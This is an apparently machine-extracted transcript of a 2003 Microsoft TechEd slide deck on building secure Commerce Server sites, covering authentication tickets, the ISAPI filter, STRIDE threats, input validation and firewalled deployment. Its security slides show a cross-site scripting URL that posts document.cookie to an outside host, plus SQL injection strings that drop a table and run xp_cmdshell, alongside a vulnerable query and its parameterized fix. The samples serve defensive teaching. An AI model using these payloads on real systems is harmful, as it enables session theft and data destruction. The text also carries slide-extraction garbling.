ebz314 building secure commerce server sites peter oehlert sdet yet huynh sde e-business server...
TRANSCRIPT
EBZ314
Building Secure Commerce Server Sites
Peter Oehlert SDETYet Huynh SDEE-Business ServerMicrosoft Corporation
Agenda
Commerce Authentication System
Secure Site Development
Secure Deployment
Additional Resources
Questions
Authentication ComponentsAuthentication Tickets
Profile Ticket
Authentication Ticket
Authentication .NET ClassesCookie or URL support
Extended property support
Authentication FilterISAPI Filter, requires cookies
Modes of operation: windows, custom, auto-cookie
Flexible Login and helper pages
Authentication Tickets
Profile TicketTracks anonymous user
Persistent cookie
Authentication TicketTracks authenticated user
Session cookie
Other featuresLinks to profile object via UserID stored in the ticket
Custom properties
Can also be encoded on URL by QueryStringBuilder class
AuthManager .NET Class
Manages authentication ticketsSets encrypted tickets using configurable encryption key
Support for rolling key encryption
Works in both cookie and cookieless scenarios
Login credential validation left to developer
Can use any data source as credential store
Integration with Data Warehouse
AuthManager Scenario (Cookie)
Application ServerApplication Server
Inetinfo processInetinfo process
IsAuthenticated()? IsAuthenticated()? OR UserIdOR UserId
Get Request (1)Get Request (1)
Access is denied, redirect to Login Form (2)Access is denied, redirect to Login Form (2)
userID/Password(3)userID/Password(3)
Redirected to original request with cookie(4)Redirected to original request with cookie(4)
Get Request (5)Get Request (5)
with cookiewith cookie
ASPX PageASPX Page
Logon Logon Form Form using using
Auth .NEAuth .NET ClassT Class
nono
Profile ServiceProfile Service
Get Profile DataGet Profile Data
BrowserBrowser(IE, (IE,
Netscape)Netscape)
Content (6)Content (6)
Authentication FilterISAPI Filter
Tightly integrated with AuthManager classExchange 2000 OWA support
Modes of operationWindows Authentication (Active Directory)Custom Authentication (Custom Database/Profile)AutoCookie (allows mix)
Secures site at virtual directoryRequires CookiesAuthentication files located at /<vroot>/Authfiles
Custom branding
Login.asp HTML form used to submit UserID & Password
And not browser dialog box
Windows Authentication
Runs thread under logged on user contextSecure resource using ACLsSingle sign on integration with Exchange 2000 OWAProxy Account Support
Granular access control using ACLsConfigurable
Can use single account for allMap groups of logins to different proxy accounts
Custom Authentication And AutoCookie
Runs thread under anonymous user accountProtects site at Vroot level (doesn’t use ACLs)Allows web farm load balancing
Does not require session/server affinity
AutoCookie allows AuthFilter to issue Profile Ticket to track anonymous users
Authentication .NET Enhancements
Thin layer of abstraction over AuthManager COM primary interop assembly
Authentication model remains the same (using tickets with AuthManager alone or with the AuthFilter)
Improved object model
Authentication .NET Object Model
CookieSupportCookieSupport
AuthManagerAuthManager
AuthTicketAuthTicket ProfileTicketProfileTicket
UserIDUserID
Properties…Properties…
UserIDUserID
PropertiesProperties……
AuthenticationInfoAuthenticationInfo
SessionCookieSupportSessionCookieSupport PersistentCookieSupportPersistentCookieSupport
QueryStringBuilderQueryStringBuilder
Authentication Authentication Specific Exception Specific Exception ClassesClasses
Authentication ModuleHTTP module added via the web.config
<section name="authentication“ type="Microsoft.CommerceServer.Runtime.Configuration.CommerceAuthenticationSectionHandler, Microsoft.CommerceServer.Runtime, Version=4.5.2002.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" />
<authentication detectCookies="true" />
Creates per request instance of AuthenticationInfo accessed via CommerceContext
Automatic client cookie support detection
.NET Commerce .NET Commerce Authentication ModuleAuthentication Module
demodemo
Yet HuynhYet HuynhSDESDEE-Business ServerE-Business Server
FAQPassport like single sign on across multiple sites
Commerce Authentication supports single sign on across applications in the same domain and across domains that share at least one domain scope.
Ie. www.CommerceServer.microsoft.com
www.Office.Microsoft.com
www.Windows.Microsoft.com
Password cache is not encrypted in AuthFilter
Requires access to Inetinfo process space.
AuthFilter requires the admin connection string to be a SQL connection string if running IIS5x
The mitigating factor is the connection string to the admin database is stored encrypted in the registry. Also, this is no longer a limitation with IIS6x.
Cookie replay issue with AuthManager This is a limitation with all authentication schemes that utilize cookies. A mitigating factor is to use SSL to secure access to the tickets.
Agenda
Commerce Authentication System
Secure Site Development
Secure Deployment
Additional Resources
Questions
STRIDE Threats
S - Spoofing Identity
T - Tampering with Data
R - Repudiation
I - Information Disclosure
D - Denial of Service
E - Elevation of Privilege
Common Web Security Mistakes
All input is evil, until proven otherwise!Cross Site Scripting
SQL Injection attacks
Cross-Site Scripting Issues
This attack has become common
Compromise the client through a flawed server
Only takes one flawed page in the domain
The mistake is echoing user inputBecause the input may be script!
CSS – How it Works
Hello, <% =Request.QueryString(“name”) %>
http://www.a.com/hello.asp?name=Blakehttp://www.a.com/hello.asp?name=Blake
http://www.a.com/hello.asp?name= <FORM action=http://www.b.com/gather.asp method=post id=“idForm”> <INPUT name=“cookie” type=“hidden”> </FORM><SCRIPT> idForm.cookie.value=document.cookie; idForm.submit();</SCRIPT>
The Bad URLThe Bad URL
http://www.b.com/gather.asphttp://www.b.com/gather.asp
Trusting Input - A Vulnerable Managed Code Example
using System.Data.SQLClient;using System.Data.SQLTypes;public static SqlMoney FreightByCargo(string company) {
SqlCommand cmd = new SqlCommand(); cmd.CommandText = "select sum(cost) as cost " +
"from orders " + "where companyname = ‘" + company + "’";
return cmd.ExecuteScalar();}
Why It’s Wrong (1 Of 2)Good Guy
Name: Foo Corp
SELECT sum(cost) FROM orders WHERE companyname='Foo Corp'
Bad Guy
Name: Blah' or 1=1 --
SELECT sum(cost) FROM ordersWHERE companyname='Blah' or 1=1 -- '
Why It’s Wrong (2 Of 2)
Really Bad Guy
Name: b’ drop table orders --SELECT sum(cost) FROM ordersWHERE companyname= 'b' drop table orders -- '
Downright Evil Guy
Name: b’ xp_cmdshell(‘fdisk.exe’) --SELECT sum(cost) FROM ordersWHERE companyname= 'b' xp_cmdshell(‘fdisk.exe’) -- '
A More Secure Managed Code Example
using System.Data.SqlServer;using System.Data.SqlTypes; public static SqlMoney FreightByCargo(string company) {
SqlCommand cmd = new SqlCommand();cmd.CommandText = "select sum(cost) as cost" +
"from orders " + "where companyname = @CompanyName”;
SqlParameter param = cmd.Parameters.Add("@CompanyName", company);
return cmd.ExecuteScalar( );}
Input RemediesDetermine what is valid input and reject everything else
Use Regular Expressions
Display user input only after sanitizing it
Passwords are problematicEscape them using Server.URLEncode or HttpServerUtility.URLEncode
Do not construct ad-hoc SQL queriesUse parameters or stored procs
NEVER use SA or DBO to logon to SQL Server from any application
Defeats Least Privilege Principle
Input Testing Ideas
Enumerate all entry points to the appSockets, RPC, pipes, files, registry keys, SOAP params, HTTP headers, form values, querystrings…
Use a tool which goes ‘underneath the radar’Perl, C#, C++
Lie about the inputMake it too big, too small, non-existent, wrong data type…
Agenda
Commerce Authentication System
Secure Site Development
Secure Deployment
Additional Resources
Questions
Securing Your SiteInfrastructure
FirewallLeast Privilege Accounts (SQL, NT Services)Throttle requests (Baskets, Checkouts, IIS)
Business Desk SecurityUse NTLM authenticationRestrict Access
ModuleTaskField/Property
Admin DBClear text connection strings to Commerce DB’sUse Windows Integrated Security for SQLSiteConfigReadOnly, SiteConfig, GlobalConfigRestrict executable scripts, componentsSet ACLs on components
Securing Your Site
Commerce DBClear text connection string in UPM BizData storeUse Windows Integrated Security for SQLUse encrypted network connection (SSL, IPSec, multi-protocol)Encrypt user passwords, credit cards (UPM Encryption)Set rights on DBs, Tables, SPs
Log filesSet ACLs on log directoryUse encrypted network connection (SSL, IPSec)
Strategic Technology Protection ProgramIISLockDownURLScanHFNetCheck
Deployment Architecture
1 2 3 4 5 6
7 8 9101112
AB
12x
6x
8x
2x
9x
3x
10x
4x
11x
5x
7x
1x
Eth
ern
et
A
12x
6x
8x
2x
9x
3x
10x
4x
11x
5x
7x
1x
C
1 2 3 4 5 6
7 8 9101112
AB
12x
6x
8x
2x
9x
3x
10x
4x
11x
5x
7x
1x
Eth
ern
et
A
12x
6x
8x
2x
9x
3x
10x
4x
11x
5x
7x
1x
C
SQLSQLAD
ISAFirewall
ISAFirewall
Web Server Web Server
1 2 3 4 5 6
7 8 9101112
AB
12x
6x
8x
2x
9x
3x
10x
4x
11x
5x
7x
1x
Eth
ern
et
A
12x
6x
8x
2x
9x
3x
10x
4x
11x
5x
7x
1x
C
ISAFirewall
ISAFirewall
SMTP Server
NLB
MSCS
Bizdesk BizdeskMOM
DW
AD
Firewall: Internet-to-WebIngress
To Web Cluster :Web (80, 443)
To DnsDns (53)
EgressFrom Web Cluster
Web (80, 443)
From DnsDns (53)
From SMTPSmtp (25)
Firewall: Web-to-DataIngress
From Web to Sql:SQL (1433)
DTC (135, 5000-5020*)
From AD to AD *
EgressFrom Sql to Web
SQL (1433)
DTC (135, 5000-5020*)
* See Commerce Secure Deployment Guide* See Commerce Secure Deployment Guide
Agenda
Commerce Authentication System
Secure Site Development
Secure Deployment
Additional Resources
Questions
ResourcesResourcesBulletins & hotfixes
http://www.microsoft.com/security
IISLockDown, URLScan, HFNetCheckhttp://www.microsoft.com/technet/security/tools/tools.asp?frame=true
Online GuidesWeb based security in Commerce Server 2002
http://www.microsoft.com/technet/prodtechnol/comm/comm2002/maintain/cs02wsec.asp
Deploying a Secure Commerce Server 2002 Sitehttp://www.microsoft.com/technet/prodtechnol/comm/comm2002/deploy/SecCncpt.asp
Building Secure ASP.Net Applicationshttp://msdn.microsoft.com/library/en-us/dnnetsec/html/secnetlpmsdn.asp
Windows Server 2003 Security Guidehttp://go.microsoft.com/fwlink/?LinkId=14845
Windows Server 2000 Security Guide http://www.microsoft.com/technet/security/prodtech/windows/secwin2k/default.asp
Product Documentation Refreshhttp://go.microsoft.com/fwlink/?LinkId=6724
Microsoft Press books are 20% off at the TechEd Bookstore
Also buy any TWO Microsoft Press books and get a FREE T-Shirt
Suggested Reading And Resources
The tools you need to put technology to work!The tools you need to put technology to work!
TITLETITLE AvailableAvailable
TodayTodayBuilding Solutions with Building Solutions with Microsoft® Commerce Server Microsoft® Commerce Server 2002:0-7356-1854-2002:0-7356-1854-
TodayTodayWriting Secure CodeWriting Secure CodeSecond EditionSecond Edition
Community ResourcesCommunity Resources
Visit the E-Business MSFT NewsgroupsBizTalk : http://www.microsoft.com/biztalk/community
Commerce Server:
http://www.microsoft.com/commerceserver/community
Content Management Server : http://www.microsoft.com/cmserver/community
Share samples at http://www.gotdotnet.com
Community Resources
Community Resourceshttp://www.microsoft.com/communities/default.mspx
Most Valuable Professional (MVP)http://www.mvp.support.microsoft.com/
NewsgroupsConverse online with Microsoft Newsgroups, including Worldwidehttp://www.microsoft.com/communities/newsgroups/default.mspx
User GroupsMeet and learn with your peershttp://www.microsoft.com/communities/usergroups/default.mspx
evaluationsevaluations
© 2003 Microsoft Corporation. All rights reserved.© 2003 Microsoft Corporation. All rights reserved.This presentation is for informational purposes only. MICROSOFT MAKES NO WARRANTIES, EXPRESS OR IMPLIED, IN THIS SUMMARY.This presentation is for informational purposes only. MICROSOFT MAKES NO WARRANTIES, EXPRESS OR IMPLIED, IN THIS SUMMARY.